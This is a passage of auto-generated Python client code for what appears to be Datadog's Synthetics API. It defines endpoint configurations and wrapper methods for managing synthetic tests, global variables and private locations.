headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._create_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocationCreationResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations",
"operation_id": "create_private_location",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsPrivateLocation,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._create_synthetics_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api",
"operation_id": "create_synthetics_api_test",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsAPITest,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._create_synthetics_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser",
"operation_id": "create_synthetics_browser_test",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsBrowserTest,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._delete_global_variable_endpoint = _Endpoint(
settings={
"response_type": None,
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "delete_global_variable",
"http_method": "DELETE",
"servers": None,
},
params_map={
"all": [
"variable_id",
],
"required": [
"variable_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._delete_private_location_endpoint = _Endpoint(
settings={
"response_type": None,
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "delete_private_location",
"http_method": "DELETE",
"servers": None,
},
params_map={
"all": [
"location_id",
],
"required": [
"location_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"location_id": (str,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._delete_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsDeleteTestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/delete",
"operation_id": "delete_tests",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsDeleteTestsPayload,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._edit_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "edit_global_variable",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"variable_id",
"body",
],
"required": [
"variable_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
"body": (SyntheticsGlobalVariable,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._get_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api/{public_id}",
"operation_id": "get_api_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_api_test_latest_results_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGetAPITestLatestResultsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/results",
"operation_id": "get_api_test_latest_results",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"from_ts",
"to_ts",
"probe_dc",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"from_ts": (int,),
"to_ts": (int,),
"probe_dc": ([str],),
},
"attribute_map": {
"public_id": "public_id",
"from_ts": "from_ts",
"to_ts": "to_ts",
"probe_dc": "probe_dc",
},
"location_map": {
"public_id": "path",
"from_ts": "query",
"to_ts": "query",
"probe_dc": "query",
},
"collection_format_map": {
"probe_dc": "multi",
},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_api_test_result_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITestResultFull,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/results/{result_id}",
"operation_id": "get_api_test_result",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"result_id",
],
"required": [
"public_id",
"result_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"result_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
"result_id": "result_id",
},
"location_map": {
"public_id": "path",
"result_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}",
"operation_id": "get_browser_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_latest_results_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGetBrowserTestLatestResultsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}/results",
"operation_id": "get_browser_test_latest_results",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"from_ts",
"to_ts",
"probe_dc",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"from_ts": (int,),
"to_ts": (int,),
"probe_dc": ([str],),
},
"attribute_map": {
"public_id": "public_id",
"from_ts": "from_ts",
"to_ts": "to_ts",
"probe_dc": "probe_dc",
},
"location_map": {
"public_id": "path",
"from_ts": "query",
"to_ts": "query",
"probe_dc": "query",
},
"collection_format_map": {
"probe_dc": "multi",
},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_result_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTestResultFull,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}/results/{result_id}",
"operation_id": "get_browser_test_result",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"result_id",
],
"required": [
"public_id",
"result_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"result_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
"result_id": "result_id",
},
"location_map": {
"public_id": "path",
"result_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "get_global_variable",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"variable_id",
],
"required": [
"variable_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocation,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "get_private_location",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"location_id",
],
"required": [
"location_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"location_id": (str,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsTestDetails,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}",
"operation_id": "get_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_global_variables_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsListGlobalVariablesResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables",
"operation_id": "list_global_variables",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_locations_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsLocations,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/locations",
"operation_id": "list_locations",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsListTestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests",
"operation_id": "list_tests",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._trigger_ci_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsTriggerCITestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/trigger/ci",
"operation_id": "trigger_ci_tests",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsCITestBody,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api/{public_id}",
"operation_id": "update_api_test",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsAPITest,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}",
"operation_id": "update_browser_test",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsBrowserTest,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocation,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "update_private_location",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"location_id",
"body",
],
"required": [
"location_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"location_id": (str,),
"body": (SyntheticsPrivateLocation,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_test_pause_status_endpoint = _Endpoint(
settings={
"response_type": (bool,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/status",
"operation_id": "update_test_pause_status",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsUpdateTestPauseStatusPayload,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
def create_global_variable(self, body, **kwargs):
"""Create a global variable # noqa: E501
Create a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_global_variable(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsGlobalVariable): Details of the global variable to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_global_variable_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_global_variable_endpoint.call_with_http_info(**kwargs)
def create_private_location(self, body, **kwargs):
"""Create a private location # noqa: E501
Create a new Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_private_location(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsPrivateLocation): Details of the private location to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocationCreationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_private_location_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_private_location_endpoint.call_with_http_info(**kwargs)
def create_synthetics_api_test(self, body, **kwargs):
"""Create an API test # noqa: E501
Create a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_synthetics_api_test(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsAPITest): Details of the test to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_synthetics_api_test_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_synthetics_api_test_endpoint.call_with_http_info(**kwargs)
def create_synthetics_browser_test(self, body, **kwargs):
"""Create a browser test # noqa: E501
Create a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_synthetics_browser_test(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsBrowserTest): Details of the test to create.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._create_synthetics_browser_test_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._create_synthetics_browser_test_endpoint.call_with_http_info(**kwargs)
def delete_global_variable(self, variable_id, **kwargs):
"""Delete a global variable # noqa: E501
Delete a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_global_variable(variable_id, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
return self._delete_global_variable_endpoint.call_with_http_info(**kwargs)
def delete_private_location(self, location_id, **kwargs):
"""Delete a private location # noqa: E501
Delete a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_private_location(location_id, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
return self._delete_private_location_endpoint.call_with_http_info(**kwargs)
def delete_tests(self, body, **kwargs):
"""Delete tests # noqa: E501
Delete multiple Synthetic tests by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tests(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsDeleteTestsPayload): Public ID list of the Synthetic tests to be deleted.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsDeleteTestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._delete_tests_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._delete_tests_endpoint.call_with_http_info(**kwargs)
def edit_global_variable(self, variable_id, body, **kwargs):
"""Edit a global variable # noqa: E501
Edit a Synthetics global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.edit_global_variable(variable_id, body, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
body (SyntheticsGlobalVariable): Details of the global variable to update.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._edit_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
kwargs["body"] = body
return self._edit_global_variable_endpoint.call_with_http_info(**kwargs)
def get_api_test(self, public_id, **kwargs):
"""Get an API test # noqa: E501
Get the detailed configuration associated with a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_api_test_endpoint.call_with_http_info(**kwargs)
def get_api_test_latest_results(self, public_id, **kwargs):
"""Get an API test's latest results summaries # noqa: E501
Get the last 50 test results summaries for a given Synthetics API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test_latest_results(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test for which to search results for.
Keyword Args:
from_ts (int): Timestamp from which to start querying results.. [optional]
to_ts (int): Timestamp up to which to query results.. [optional]
probe_dc ([str]): Locations for which to query results.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGetAPITestLatestResultsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_latest_results_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_api_test_latest_results_endpoint.call_with_http_info(**kwargs)
def get_api_test_result(self, public_id, result_id, **kwargs):
"""Get an API test result # noqa: E501
Get a specific full result from a given (API) Synthetic test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_test_result(public_id, result_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the API test to which the target result belongs.
result_id (str): The ID of the result to get.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITestResultFull
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_api_test_result_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["result_id"] = result_id
return self._get_api_test_result_endpoint.call_with_http_info(**kwargs)
def get_browser_test(self, public_id, **kwargs):
"""Get a browser test # noqa: E501
Get the detailed configuration (including steps) associated with a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
